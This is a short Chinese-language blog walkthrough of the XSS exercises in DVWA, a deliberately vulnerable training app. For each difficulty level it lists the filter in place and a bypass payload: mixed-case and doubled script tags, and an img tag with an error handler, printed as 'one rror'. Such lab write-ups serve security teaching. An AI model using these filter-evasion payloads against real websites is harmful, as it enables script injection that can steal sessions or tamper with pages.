xss reflected
low
payload:<script>alert('xxx')</script>
medium
防御措施:使用str_replace函数替换了所有的<script>
绕过:
str_replace对大小写并不敏感,或者双写绕过
payload:<Script>alert('xxx')</script>
<scr<script>ipt>alert('xxx')</script>
high
防御措施
使用preg_replace函数,只要出现script都会被替换为空
绕过
使用img标签
payload:<img src = "" one rror=alert("xss")>
xss(stored)
low
payload:<script>alert('xxx')</script>
medium
防御措施
对message使用htmlspecialchars函数进行了处理,所以无法在这里进行注入
对name使用了str_replace函数进行了处理,将name作为注入的目标
绕过
name对长度有限制,所以通过修改网站源码,将name的长度修改成50,然后进行注入,大写或者双写绕过都可以
payload:<Script>alert('xss')</script>
high
防御:对message进行了htmlspecialchars()的处理,对name进行了preg_replace()的处理,所以在name处注入,并且不能使用<script>标签,所以使用img标签进行注入。
绕过
payload:<img src = "" one rror="alert ('12345')">
标签:xss,name,--,dvwa,replace,绕过,alert,payload From: https://www.cnblogs.com/L-1906/p/17616964.html